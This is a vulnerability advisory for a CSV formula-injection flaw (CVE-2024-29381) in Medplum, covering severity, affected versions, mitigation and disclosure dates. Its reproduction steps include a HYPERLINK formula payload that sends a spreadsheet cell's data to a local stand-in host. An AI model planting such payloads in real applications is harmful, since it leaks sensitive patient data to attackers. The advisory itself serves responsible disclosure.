CVE Number
CVE-2024-29381
Loginsoft ID
Loginsoft-2024-1012
Description
The application “Medplum” is affected by CSV/formula injection vulnerability, posing a risk of exposing sensitive data. An attacker could inject a malicious payload into input fields. Subsequently, when a high-privileged user exports the data as CSV, the injected payload may be executed.
CWE
CWE-1236: Improper Neutralization of Formula Elements in a CSV File
Affected Versions
< v3.0.8
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 6.8(Medium)
Steps To Reproduce
- Create a new patient with gender field having the payload `=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me") `.
- Now Export patient data in CSV format.
- Open the CSV file, press the Ctrl key, and left click on the cell with the value Click Me.
- Doing this exposes the sensitive data of the user located in cell F3.
Impact
Exposure of sensitive data.
Mitigation:
Convert each field into text when exporting as CSV. Additionally, add filters to the input fields.
Fix
Discovered Date
15 February 2024
Reported Date
19 February 2024
Patched Date
03 March 2024
Credit
Saharsh Agrawal
